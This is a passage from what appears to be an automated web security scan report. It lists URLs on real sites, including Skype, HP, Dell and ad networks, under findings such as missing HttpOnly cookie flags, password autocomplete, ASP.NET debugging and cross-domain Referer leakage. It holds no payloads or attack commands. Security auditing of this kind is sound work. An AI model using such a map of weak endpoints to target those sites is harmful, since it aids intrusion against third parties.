10.61. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/maracas/avatar-theme/candy/avatar-collection/music/avatar-display-size/message

10.62. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/pyramids/avatar-theme/candy/avatar-collection/architecture/avatar-display-size/message

10.63. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/trumpet/avatar-theme/candy/avatar-collection/music/avatar-display-size/message

10.64. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/video/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message

10.65. http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js

10.66. http://skypec.i.lithium.com/t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js

10.67. http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js

10.68. http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js

10.69. http://skypec.i.lithium.com/t5/scripts/A07927DB54138E290B0015853D34D7F4/lia-scripts-body-min.js

10.70. http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js

10.71. http://tags.bluekai.com/site/4234

10.72. http://tracker.marinsm.com/rd

10.73. http://ui.skype.com/ui/0/5.5.0.114./en/help

10.74. http://ui.skype.com/ui/0/5.5.0.114./en/upgrade

10.75. http://ui.skype.com/ui/0/5.5.0.114./en/upgraded

10.76. http://ui.skype.com/ui/0/5.5.0.115./en/go/apps

10.77. http://ui.skype.com/ui/0/5.5.0.115./en/go/prices

10.78. http://ui.skype.com/ui/0/5.5.0.115./en/go/share

10.79. http://ui.skype.com/ui/0/5.5.0.115./en/go/subscriptions

10.80. http://vap1den1.lijit.com/www/delivery/lg.php

10.81. http://vap1iad1.lijit.com/www/delivery/lg.php

10.82. http://vap1iad2.lijit.com/www/delivery/lg.php

10.83. http://vap1sfo1.lijit.com/www/delivery/lg.php

10.84. http://vap2den1.lijit.com/www/delivery/lg.php

10.85. http://vap2iad1.lijit.com/www/delivery/lg.php

10.86. http://vap3den1.lijit.com/www/delivery/lg.php

10.87. http://www.imiclk.com/cgi/r.cgi

10.88. http://www.lijit.com/beacon

11. Cookie without HttpOnly flag set

11.1. http://afe.specificclick.net/

11.2. http://ecustomeropinions.com/survey/survey.php

11.3. http://h10088.www1.hp.com/cda/gap/display/main/index.jsp

11.4. http://h30187.www3.hp.com/

11.5. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm

11.6. http://h30187.www3.hp.com/howto_QL_courses.jsp

11.7. http://h30187.www3.hp.com/index.jsp

11.8. http://h30187.www3.hp.com/pv.gif

11.9. https://login.skype.com/account/password-reset-request

11.10. https://login.skype.com/password-reset-request

11.11. https://mpsnare.iesnare.com/snare.js

11.12. http://pixel.adsafeprotected.com/jspix

11.13. https://secure.skype.com/account/buy/package

11.14. https://secure.skype.com/account/login

11.15. https://support.skype.com/

11.16. http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp

11.17. http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps

11.18. http://142.xg4ken.com/media/redir.php

11.19. http://accessories.us.dell.com/sna/DellPartsFamily.aspx

11.20. http://accessories.us.dell.com/sna/ShopAllBrands.aspx

11.21. http://accessories.us.dell.com/sna/batteryconfig.aspx

11.22. http://accessories.us.dell.com/sna/category.aspx

11.23. http://accessories.us.dell.com/sna/category.aspx

11.24. http://accessories.us.dell.com/sna/default.aspx

11.25. http://accessories.us.dell.com/sna/memconfig.aspx

11.26. http://accessories.us.dell.com/sna/printersupplies.aspx

11.27. http://accessories.us.dell.com/sna/productdetail.aspx

11.28. http://accessories.us.dell.com/sna/sna.aspx

11.29. http://ad.yieldmanager.com/pixel

11.30. https://adwords.google.com/um/StartNewLogin

11.31. http://apr.lijit.com///www/delivery/ajs.php

11.32. http://b.scorecardresearch.com/b

11.33. http://b.scorecardresearch.com/p

11.34. http://b.scorecardresearch.com/r

11.35. http://ce.lijit.com/merge

11.36. http://community.skype.com/t5/Android%27/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

11.37. http://community.skype.com/t5/English/ct-p/English

11.38. http://community.skype.com/t5/image/serverpage/image-id/60iD23BC4754E7B32F3/image-dimensions/64x36

11.39. http://content.dell.com/us/en/business/security-network.aspx

11.40. http://cymphonix.app3.hubspot.com/salog.js.aspx

11.41. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/6981940571811189480/mchpid/2/url/

11.42. http://data.cmcore.com/imp

11.43. http://dce.sapha.com/logging.php

11.44. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard

11.45. http://eas.apm.emediate.eu/eas

11.46. http://gacela.eu/bb/mrcsrc/getpixel.php

11.47. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx

11.48. http://h30187.www3.hp.com/is/233e5e7671/p/productId/104921/eventType/PDV/puid/999999b/i.gif

11.49. http://h30187.www3.hp.com/is/3569c10978/p/productId/104920/eventType/PDV/puid/999999b/i.gif

11.50. http://h30187.www3.hp.com/is/3af2f4399a/p/productId/104918/eventType/PDV/puid/999999b/i.gif

11.51. http://h30187.www3.hp.com/is/6b0543035d/p/productId/104922/eventType/PDV/puid/999999b/i.gif

11.52. http://h30187.www3.hp.com/is/778ee93a0e/p/productId/104919/eventType/PDV/puid/999999b/i.gif

11.53. http://h30187.www3.hp.com/is/99bcf3130c/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif

11.54. http://h30187.www3.hp.com/is/fdee7fcaf7/p/productId/104931/eventType/PDV/puid/999999b/i.gif

11.55. http://h30187.www3.hp.com/resources/images/email-icon.gif

11.56. http://h30187.www3.hp.com/resources/images/print.gif

11.57. http://h30187.www3.hp.com/resources/images/s.gif

11.58. http://h30434.www3.hp.com/

11.59. https://login.skype.com/account/

11.60. https://login.skype.com/account/login-form

11.61. https://login.skype.com/account/password-automation

11.62. https://login.skype.com/account/password-token-sent

11.63. https://login.skype.com/account/signup-form

11.64. https://login.skype.com/go/shop

11.65. https://login.skype.com/go/shop.accessories.headsets

11.66. https://login.skype.com/go/shop.accessories.phones

11.67. https://login.skype.com/go/shop.accessories.webcams

11.68. https://login.skype.com/go/shop.extras

11.69. https://login.skype.com/go/skype.manager.setup

11.70. https://login.skype.com/go/tvwebcams

11.71. http://m.webtrends.com/dcsmgru7m99k7mqmgrhudo0k8_8c6m/dcs.gif

11.72. http://media.fastclick.net/w/tre

11.73. http://metrics.skype.com/b/ss/skypeallprod/1/H.17/s33706402148852

11.74. https://mid.live.com/si/login.aspx/x22

11.75. https://mid.live.com/si/login.aspx/x3c/cite/x3e/x3cspan

11.76. http://msdn.microsoft.com/en-us/library/ms533897(v=vs.85).aspx

11.77. http://pixel.33across.com/ps/

11.78. http://pixel.quantserve.com/pixel/p-46B_c711bvEMM.gif

11.79. http://pixel.quantserve.com/pixel/p-56WJ0KtIxWJ_2.gif

11.80. http://r.turn.com/r/beacon

11.81. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/149046210

11.82. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/1662255836

11.83. http://rotation.linuxnewmedia.com/www/delivery/ajs.php

11.84. http://rotation.linuxnewmedia.com/www/delivery/lg.php

11.85. http://search.dell.com/public/css.aspx

11.86. http://search.dell.com/public/menu.aspx

11.87. http://search.dell.com/results.aspx

11.88. https://secure.skype.com/login

11.89. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/bike/avatar-theme/candy/avatar-collection/transit/avatar-display-size/message

11.90. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/camera/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message

11.91. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/dog/avatar-theme/candy/avatar-collection/animals/avatar-display-size/message

11.92. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/maracas/avatar-theme/candy/avatar-collection/music/avatar-display-size/message

11.93. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/pyramids/avatar-theme/candy/avatar-collection/architecture/avatar-display-size/message

11.94. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/trumpet/avatar-theme/candy/avatar-collection/music/avatar-display-size/message

11.95. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/video/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message

11.96. http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js

11.97. http://skypec.i.lithium.com/t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js

11.98. http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js

11.99. http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js

11.100. http://skypec.i.lithium.com/t5/scripts/A07927DB54138E290B0015853D34D7F4/lia-scripts-body-min.js

11.101. http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js

11.102. http://statse.webtrendslive.com/dcs2aqcdt10000oakh3fs9xoa_2g3x/dcs.gif

11.103. http://tag.admeld.com/ad/js/179/lijit/728x90/ros

11.104. http://tags.bluekai.com/site/4234

11.105. http://tracker.marinsm.com/rd

11.106. http://trk.etrigue.com/track.php

11.107. http://ui.skype.com/ui/0/5.5.0.114./en/help

11.108. http://ui.skype.com/ui/0/5.5.0.114./en/upgrade

11.109. http://ui.skype.com/ui/0/5.5.0.114./en/upgraded

11.110. http://ui.skype.com/ui/0/5.5.0.115./en/go/apps

11.111. http://ui.skype.com/ui/0/5.5.0.115./en/go/prices

11.112. http://ui.skype.com/ui/0/5.5.0.115./en/go/share

11.113. http://ui.skype.com/ui/0/5.5.0.115./en/go/subscriptions

11.114. http://vap1den1.lijit.com/www/delivery/lg.php

11.115. http://vap1iad1.lijit.com/www/delivery/lg.php

11.116. http://vap1iad2.lijit.com/www/delivery/lg.php

11.117. http://vap1sfo1.lijit.com/www/delivery/lg.php

11.118. http://vap2den1.lijit.com/www/delivery/lg.php

11.119. http://vap2iad1.lijit.com/www/delivery/lg.php

11.120. http://vap3den1.lijit.com/www/delivery/lg.php

11.121. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php

11.122. http://www.googleadservices.com/pagead/aclk

11.123. http://www.hl.com/

11.124. http://www.hlhz.com/us/

11.125. http://www.imiclk.com/cgi/r.cgi

11.126. http://www.lijit.com/beacon

11.127. http://www.newsgator.com/images/ngsub1.gif

12. Password field with autocomplete enabled

12.1. https://mid.live.com/si/login.aspx/x22

12.2. https://mid.live.com/si/login.aspx/x3c/cite/x3e/x3cspan

12.3. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html

12.4. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html

13. Source code disclosure

13.1. https://developer.skype.com/javascripts/skype/pp/prettify.js

13.2. http://platform.linkedin.com/js/nonSecureAnonymousFramework

14. ASP.NET debugging enabled

14.1. http://h17007.www1.hp.com/Default.aspx

14.2. http://h20158.www2.hp.com/Default.aspx

15. Referer-dependent response

16. Cross-domain POST

16.1. http://blogs.skype.com/de/

16.2. http://blogs.skype.com/developer/

16.3. http://blogs.skype.com/developer/2011/03/longer_playtime_courtesy_of_si.html

16.4. http://blogs.skype.com/developer/2011/06/breaking_down_the_barriers_one.html

16.5. http://blogs.skype.com/developer/2011/06/bringing_video_to_the_next_wav.html

16.6. http://blogs.skype.com/en/

16.7. http://blogs.skype.com/en/2005/05/

16.8. http://blogs.skype.com/en/2005/06/

16.9. http://blogs.skype.com/en/2005/07/

16.10. http://blogs.skype.com/en/2005/08/

16.11. http://blogs.skype.com/en/2005/09/

16.12. http://blogs.skype.com/en/2005/10/

16.13. http://blogs.skype.com/en/2005/11/

16.14. http://blogs.skype.com/en/2005/12/

16.15. http://blogs.skype.com/en/2006/01/

16.16. http://blogs.skype.com/en/2006/02/

16.17. http://blogs.skype.com/en/2006/03/

16.18. http://blogs.skype.com/en/2006/04/

16.19. http://blogs.skype.com/en/2006/05/

16.20. http://blogs.skype.com/en/2006/06/

16.21. http://blogs.skype.com/en/2006/07/

16.22. http://blogs.skype.com/en/2006/08/

16.23. http://blogs.skype.com/en/2006/09/

16.24. http://blogs.skype.com/en/2006/10/

16.25. http://blogs.skype.com/en/2006/11/

16.26. http://blogs.skype.com/en/2006/12/

16.27. http://blogs.skype.com/en/2007/01/

16.28. http://blogs.skype.com/en/2007/02/

16.29. http://blogs.skype.com/en/2007/03/

16.30. http://blogs.skype.com/en/2007/04/

16.31. http://blogs.skype.com/en/2007/05/

16.32. http://blogs.skype.com/en/2007/06/

16.33. http://blogs.skype.com/en/2007/07/

16.34. http://blogs.skype.com/en/2007/08/

16.35. http://blogs.skype.com/en/2007/09/

16.36. http://blogs.skype.com/en/2007/10/

16.37. http://blogs.skype.com/en/2007/11/

16.38. http://blogs.skype.com/en/2008/01/

16.39. http://blogs.skype.com/en/2008/02/

16.40. http://blogs.skype.com/en/2008/03/

16.41. http://blogs.skype.com/en/2008/04/

16.42. http://blogs.skype.com/en/2008/05/

16.43. http://blogs.skype.com/en/2008/06/

16.44. http://blogs.skype.com/en/2008/07/

16.45. http://blogs.skype.com/en/2008/08/

16.46. http://blogs.skype.com/en/2008/09/

16.47. http://blogs.skype.com/en/2008/10/

16.48. http://blogs.skype.com/en/2008/11/

16.49. http://blogs.skype.com/en/2008/12/

16.50. http://blogs.skype.com/en/2009/01/

16.51. http://blogs.skype.com/en/2009/02/

16.52. http://blogs.skype.com/en/2009/03/

16.53. http://blogs.skype.com/en/2009/04/

16.54. http://blogs.skype.com/en/2009/05/

16.55. http://blogs.skype.com/en/2009/06/

16.56. http://blogs.skype.com/en/2009/07/

16.57. http://blogs.skype.com/en/2009/08/

16.58. http://blogs.skype.com/en/2009/09/

16.59. http://blogs.skype.com/en/2009/10/

16.60. http://blogs.skype.com/en/2009/11/

16.61. http://blogs.skype.com/en/2009/12/

16.62. http://blogs.skype.com/en/2010/01/

16.63. http://blogs.skype.com/en/2010/02/

16.64. http://blogs.skype.com/en/2010/03/

16.65. http://blogs.skype.com/en/2010/04/

16.66. http://blogs.skype.com/en/2010/05/

16.67. http://blogs.skype.com/en/2010/06/

16.68. http://blogs.skype.com/en/2010/07/

16.69. http://blogs.skype.com/en/2010/08/

16.70. http://blogs.skype.com/en/2010/09/

16.71. http://blogs.skype.com/en/2010/10/

16.72. http://blogs.skype.com/en/2010/11/

16.73. http://blogs.skype.com/en/2010/12/

16.74. http://blogs.skype.com/en/2011/01/

16.75. http://blogs.skype.com/en/2011/02/

16.76. http://blogs.skype.com/en/2011/03/

16.77. http://blogs.skype.com/en/2011/04/

16.78. http://blogs.skype.com/en/2011/05/

16.79. http://blogs.skype.com/en/2011/06/

16.80. http://blogs.skype.com/en/2011/07/

16.81. http://blogs.skype.com/en/2011/08/

16.82. http://blogs.skype.com/en/2011/08/using_skype_from_your_home_phone.html

16.83. http://blogs.skype.com/en/2011/09/

16.84. http://blogs.skype.com/en/2011/09/introducing_skypesupport_on_tw.html

16.85. http://blogs.skype.com/en/advertising/

16.86. http://blogs.skype.com/en/android/

16.87. http://blogs.skype.com/en/apps/

16.88. http://blogs.skype.com/en/blackberry/

16.89. http://blogs.skype.com/en/brew/

16.90. http://blogs.skype.com/en/campaigns_and_promotions/

16.91. http://blogs.skype.com/en/careers/

16.92. http://blogs.skype.com/en/comments.html

16.93. http://blogs.skype.com/en/corporate/

16.94. http://blogs.skype.com/en/education/

16.95. http://blogs.skype.com/en/enterprise/

16.96. http://blogs.skype.com/en/entertainment/

16.97. http://blogs.skype.com/en/events/

16.98. http://blogs.skype.com/en/facebook/

16.99. http://blogs.skype.com/en/html-guide.html

16.100. http://blogs.skype.com/en/insight/

16.101. http://blogs.skype.com/en/iphone/

16.102. http://blogs.skype.com/en/life_at_skype/

16.103. http://blogs.skype.com/en/mac/

16.104. http://blogs.skype.com/en/mobile/

16.105. http://blogs.skype.com/en/mwc/

16.106. http://blogs.skype.com/en/open_internet/

16.107. http://blogs.skype.com/en/palm/

16.108. http://blogs.skype.com/en/skype_on_your_tv/

16.109. http://blogs.skype.com/en/social_good/

16.110. http://blogs.skype.com/en/sony_ericsson/

16.111. http://blogs.skype.com/en/subscriptions/

16.112. http://blogs.skype.com/en/symbian/

16.113. http://blogs.skype.com/en/verizon_wireless/

16.114. http://blogs.skype.com/en/wifi/

16.115. http://blogs.skype.com/en/windows/

16.116. http://blogs.skype.com/en/windows_mobile/

16.117. http://blogs.skype.com/enterprise/

16.118. http://blogs.skype.com/es/

16.119. http://blogs.skype.com/et/

16.120. http://blogs.skype.com/fr/

16.121. http://blogs.skype.com/garage/

16.122. http://blogs.skype.com/it/

16.123. http://blogs.skype.com/ja/

16.124. http://blogs.skype.com/ko/

16.125. http://blogs.skype.com/linux/

16.126. http://blogs.skype.com/mac/

16.127. http://blogs.skype.com/pl/

16.128. http://blogs.skype.com/play/

16.129. http://blogs.skype.com/pt/

16.130. http://blogs.skype.com/ru/

16.131. http://blogs.skype.com/security/

16.132. http://blogs.skype.com/zh-Hans/

16.133. http://blogs.skype.com/zh-Hant/

16.134. http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml

17. Cross-domain Referer leakage

17.1. http://accessories.us.dell.com/sna/DellPartsFamily.aspx

17.2. http://accessories.us.dell.com/sna/ShopAllBrands.aspx

17.3. http://accessories.us.dell.com/sna/batteryconfig.aspx

17.4. http://accessories.us.dell.com/sna/category.aspx

17.5. http://accessories.us.dell.com/sna/default.aspx

17.6. http://accessories.us.dell.com/sna/memconfig.aspx

17.7. http://accessories.us.dell.com/sna/printersupplies.aspx

17.8. http://accessories.us.dell.com/sna/sna.aspx

17.9. http://ad.doubleclick.net/adi/N5371.149925.MARTINIMEDIANETWORK/B5703799.12

17.10. http://ad.doubleclick.net/adi/interactive.wsj.com/newscolumns_businessstory

17.11. http://ad.doubleclick.net/adi/interactive.wsj.com/newscolumns_businessstory

17.12. http://ad.doubleclick.net/adi/interactive.wsj.com/snippet_free_pass

17.13. http://ad.doubleclick.net/adi/interactive.wsj.com/snippet_free_pass

17.14. http://ad.doubleclick.net/adj/lqm.w3schools.site/RON

17.15. http://ad.turn.com/server/ads.js

17.16. http://afe.specificclick.net/serve/v=5

17.17. http://afe.specificclick.net/serve/v=5

17.18. http://apps.sapha.com/appshandler.php

17.19. http://community.skype.com/t5/English/ct-p/English

17.20. http://community.skype.com/t5/forums/searchpage/tab/message

17.21. http://community.skype.com/t5/forums/searchpage/tab/message

17.22. http://content.dell.com/us/en/business/security-network.aspx

17.23. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax

17.24. http://ecustomeropinions.com/survey/survey.php

17.25. http://fls.doubleclick.net/activityi

17.26. http://fls.doubleclick.net/activityi

17.27. http://fls.doubleclick.net/activityi

17.28. https://fls.doubleclick.net/activityi

17.29. http://googleads.g.doubleclick.net/pagead/ads

17.30. http://googleads.g.doubleclick.net/pagead/ads

17.31. http://googleads.g.doubleclick.net/pagead/ads

17.32. http://googleads.g.doubleclick.net/pagead/ads

17.33. http://googleads.g.doubleclick.net/pagead/ads

17.34. http://googleads.g.doubleclick.net/pagead/ads

17.35. http://googleads.g.doubleclick.net/pagead/ads

17.36. http://googleads.g.doubleclick.net/pagead/ads

17.37. http://googleads.g.doubleclick.net/pagead/ads

17.38. http://googleads.g.doubleclick.net/pagead/ads

17.39. http://googleads.g.doubleclick.net/pagead/ads

17.40. http://googleads.g.doubleclick.net/pagead/ads

17.41. http://h10088.www1.hp.com/cda/gap/display/main/index.jsp

17.42. http://h20180.www2.hp.com/apps/Nav

17.43. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx

17.44. http://h30187.www3.hp.com/

17.45. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm

17.46. http://h30187.www3.hp.com/howto_QL_courses.jsp

17.47. http://h30187.www3.hp.com/index.jsp

17.48. http://h30261.www3.hp.com/phoenix.zhtml

17.49. https://h41183.www4.hp.com/inflexion/

17.50. https://login.skype.com/account/

17.51. https://login.skype.com/account/login-form

17.52. https://login.skype.com/account/password-automation

17.53. https://login.skype.com/account/password-reset-request

17.54. https://login.skype.com/account/password-token-sent

17.55. https://login.skype.com/account/signup-form

17.56. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/wallstreetoasis.com/ROS/1188128263@Right

17.57. http://oasc18015.247realmedia.com/RealMedia/ads/adstream_jx.ads/www.wallstreetoasis.rgm/paid/1586444613@Right

17.58. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html

17.59. http://s1.lqcdn.com/m.min.js

17.60. http://search.dell.com/results.aspx

17.61. http://search.hp.com/query.html

17.62. http://search2.skype.com/search/search.cgi

17.63. https://secure.skype.com/login

17.64. http://shop.skype.com/apps/Search-Results.html

17.65. https://support.skype.com/en-us/faq/FA10414/How-do-subscriptions-work

17.66. https://support.skype.com/en-us/faq/FA10416/Why-isn-t-my-subscription-working

17.67. https://support.skype.com/en-us/faq/FA109/I-ve-forgotten-my-password

17.68. https://support.skype.com/en-us/faq/FA11024/Can-I-make-video-calls-on-Facebook

17.69. https://support.skype.com/en-us/faq/FA140/How-can-I-change-my-privacy-settings

17.70. https://support.skype.com/en-us/faq/FA331/What-is-an-Online-Number

17.71. https://support.skype.com/en-us/faq/FA351/How-can-I-pay-for-Skype-products

17.72. https://support.skype.com/en-us/faq/FA589/Why-can-t-I-sign-in-to-Skype

17.73. https://support.skype.com/en/faq/FA10673/What-is-Skype-Home

17.74. https://support.skype.com/en/faq/FA109/I-ve-forgotten-my-password

17.75. https://support.skype.com/en/faq/FA1170/How-can-I-contact-Skype-Customer-Service

17.76. https://support.skype.com/en/faq/FA96/How-do-I-change-my-email-address-or-add-another-email-address-to-my-profile

17.77. https://support.skype.com/en/search

17.78. https://support.skype.com/faqView.do

17.79. https://support.skype.com/search.do

17.80. http://view.atdmt.com/CNT/iview/334305255/direct/01

17.81. http://view.atdmt.com/CNT/iview/334305255/direct/01

17.82. http://view.atdmt.com/I36/iview/325171692/direct

17.83. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php

17.84. http://www.cymphonix.com/2011-shaping-demo-sem.html

17.85. http://www.facebook.com/plugins/fan.php

17.86. http://www.google.com/cse

17.87. http://www.google.com/search

17.88. http://www.google.com/search

17.89. http://www.google.com/search

17.90. http://www.google.com/search

17.91. http://www.google.com/url

17.92. http://www.google.com/url

17.93. http://www.google.com/url

17.94. http://www.google.com/url

17.95. http://www.google.com/url

17.96. http://www.google.com/url

17.97. http://www.hlhz.com/us/home.aspx

17.98. http://www.lijit.com/beacon

17.99. http://www.livehelpnow.net/lhn/functions/imageserver.ashx

17.100. http://www.radware.com/Resources/AppWallSolution.aspx

17.101. http://www.skype.com/intl/en-us/prices/pay-monthly/

17.102. http://www.skype.com/intl/en-us/prices/payg-rates-special-offer/

17.103. http://www.skype.com/intl/en-us/prices/premium

17.104. http://www.skype.com/intl/en-us/tell-a-friend/

17.105. http://www.skype.com/intl/en/prices/pay-monthly/

17.106. http://www.skype.com/intl/en/prices/premium

17.107. http://www.w3schools.com/jsref/tryit.asp

17.108. http://www.w3schools.com/jsref/tryit.asp

17.109. http://www.w3schools.com/jsref/tryit.asp

17.110. http://www.w3schools.com/jsref/tryit_view.asp

17.111. http://www.w3schools.com/jsref/tryit_view.asp

17.112. http://www.w3schools.com/jsref/tryit_view.asp

17.113. http://www.w3schools.com/tryitbanner.asp

18. Cross-domain script include

18.1. http://ad.doubleclick.net/adi/N5371.149925.MARTINIMEDIANETWORK/B5703799.12

18.2. http://afe.specificclick.net/serve/v=5

18.3. http://blogs.skype.com/de/

18.4. http://blogs.skype.com/developer/

18.5. http://blogs.skype.com/developer/2011/03/longer_playtime_courtesy_of_si.html

18.6. http://blogs.skype.com/developer/2011/06/breaking_down_the_barriers_one.html

18.7. http://blogs.skype.com/developer/2011/06/bringing_video_to_the_next_wav.html

18.8. http://blogs.skype.com/en/

18.9. http://blogs.skype.com/en/2005/05/

18.10. http://blogs.skype.com/en/2005/06/

18.11. http://blogs.skype.com/en/2005/07/

18.12. http://blogs.skype.com/en/2005/08/

18.13. http://blogs.skype.com/en/2005/09/

18.14. http://blogs.skype.com/en/2005/10/

18.15. http://blogs.skype.com/en/2005/11/

18.16. http://blogs.skype.com/en/2005/12/

18.17. http://blogs.skype.com/en/2006/01/

18.18. http://blogs.skype.com/en/2006/02/

18.19. http://blogs.skype.com/en/2006/03/

18.20. http://blogs.skype.com/en/2006/04/

18.21. http://blogs.skype.com/en/2006/05/

18.22. http://blogs.skype.com/en/2006/06/

18.23. http://blogs.skype.com/en/2006/07/

18.24. http://blogs.skype.com/en/2006/08/

18.25. http://blogs.skype.com/en/2006/09/

18.26. http://blogs.skype.com/en/2006/10/

18.27. http://blogs.skype.com/en/2006/11/

18.28. http://blogs.skype.com/en/2006/12/

18.29. http://blogs.skype.com/en/2007/01/

18.30. http://blogs.skype.com/en/2007/02/

18.31. http://blogs.skype.com/en/2007/03/

18.32. http://blogs.skype.com/en/2007/04/

18.33. http://blogs.skype.com/en/2007/05/

18.34. http://blogs.skype.com/en/2007/06/

18.35. http://blogs.skype.com/en/2007/07/

18.36. http://blogs.skype.com/en/2007/08/

18.37. http://blogs.skype.com/en/2007/09/

18.38. http://blogs.skype.com/en/2007/10/

18.39. http://blogs.skype.com/en/2007/11/

18.40. http://blogs.skype.com/en/2008/01/

18.41. http://blogs.skype.com/en/2008/02/

18.42. http://blogs.skype.com/en/2008/03/

18.43. http://blogs.skype.com/en/2008/04/

18.44. http://blogs.skype.com/en/2008/05/

18.45. http://blogs.skype.com/en/2008/06/

18.46. http://blogs.skype.com/en/2008/07/

18.47. http://blogs.skype.com/en/2008/08/

18.48. http://blogs.skype.com/en/2008/09/

18.49. http://blogs.skype.com/en/2008/10/

18.50. http://blogs.skype.com/en/2008/11/

18.51. http://blogs.skype.com/en/2008/12/

18.52. http://blogs.skype.com/en/2009/01/

18.53. http://blogs.skype.com/en/2009/02/

18.54. http://blogs.skype.com/en/2009/03/

18.55. http://blogs.skype.com/en/2009/04/

18.56. http://blogs.skype.com/en/2009/05/

18.57. http://blogs.skype.com/en/2009/06/

18.58. http://blogs.skype.com/en/2009/07/

18.59. http://blogs.skype.com/en/2009/08/

18.60. http://blogs.skype.com/en/2009/09/

18.61. http://blogs.skype.com/en/2009/10/

18.62. http://blogs.skype.com/en/2009/11/

18.63. http://blogs.skype.com/en/2009/12/

18.64. http://blogs.skype.com/en/2010/01/

18.65. http://blogs.skype.com/en/2010/02/

18.66. http://blogs.skype.com/en/2010/03/

18.67. http://blogs.skype.com/en/2010/04/

18.68. http://blogs.skype.com/en/2010/05/

18.69. http://blogs.skype.com/en/2010/06/

18.70. http://blogs.skype.com/en/2010/07/

18.71. http://blogs.skype.com/en/2010/08/

18.72. http://blogs.skype.com/en/2010/09/

18.73. http://blogs.skype.com/en/2010/10/

18.74. http://blogs.skype.com/en/2010/11/

18.75. http://blogs.skype.com/en/2010/12/

18.76. http://blogs.skype.com/en/2011/01/

18.77. http://blogs.skype.com/en/2011/02/

18.78. http://blogs.skype.com/en/2011/03/

18.79. http://blogs.skype.com/en/2011/04/

18.80. http://blogs.skype.com/en/2011/05/

18.81. http://blogs.skype.com/en/2011/06/

18.82. http://blogs.skype.com/en/2011/07/

18.83. http://blogs.skype.com/en/2011/08/

18.84. http://blogs.skype.com/en/2011/08/using_skype_from_your_home_phone.html

18.85. http://blogs.skype.com/en/2011/09/

18.86. http://blogs.skype.com/en/2011/09/introducing_skypesupport_on_tw.html

18.87. http://blogs.skype.com/en/advertising/

18.88. http://blogs.skype.com/en/android/

18.89. http://blogs.skype.com/en/apps/

18.90. http://blogs.skype.com/en/blackberry/

18.91. http://blogs.skype.com/en/brew/

18.92. http://blogs.skype.com/en/campaigns_and_promotions/

18.93. http://blogs.skype.com/en/careers/

18.94. http://blogs.skype.com/en/comments.html

18.95. http://blogs.skype.com/en/corporate/

18.96. http://blogs.skype.com/en/education/

18.97. http://blogs.skype.com/en/enterprise/

18.98. http://blogs.skype.com/en/entertainment/

18.99. http://blogs.skype.com/en/events/

18.100. http://blogs.skype.com/en/facebook/

18.101. http://blogs.skype.com/en/html-guide.html

18.102. http://blogs.skype.com/en/insight/

18.103. http://blogs.skype.com/en/iphone/

18.104. http://blogs.skype.com/en/life_at_skype/

18.105. http://blogs.skype.com/en/mac/

18.106. http://blogs.skype.com/en/mobile/

18.107. http://blogs.skype.com/en/mwc/

18.108. http://blogs.skype.com/en/open_internet/

18.109. http://blogs.skype.com/en/palm/

18.110. http://blogs.skype.com/en/skype_on_your_tv/

18.111. http://blogs.skype.com/en/social_good/

18.112. http://blogs.skype.com/en/sony_ericsson/

18.113. http://blogs.skype.com/en/subscriptions/

18.114. http://blogs.skype.com/en/symbian/

18.115. http://blogs.skype.com/en/verizon_wireless/

18.116. http://blogs.skype.com/en/wifi/

18.117. http://blogs.skype.com/en/windows/

18.118. http://blogs.skype.com/en/windows_mobile/

18.119. http://blogs.skype.com/enterprise/

18.120. http://blogs.skype.com/es/

18.121. http://blogs.skype.com/et/

18.122. http://blogs.skype.com/fr/

18.123. http://blogs.skype.com/garage/

18.124. http://blogs.skype.com/it/

18.125. http://blogs.skype.com/ja/

18.126. http://blogs.skype.com/ko/

18.127. http://blogs.skype.com/linux/

18.128. http://blogs.skype.com/mac/

18.129. http://blogs.skype.com/pl/

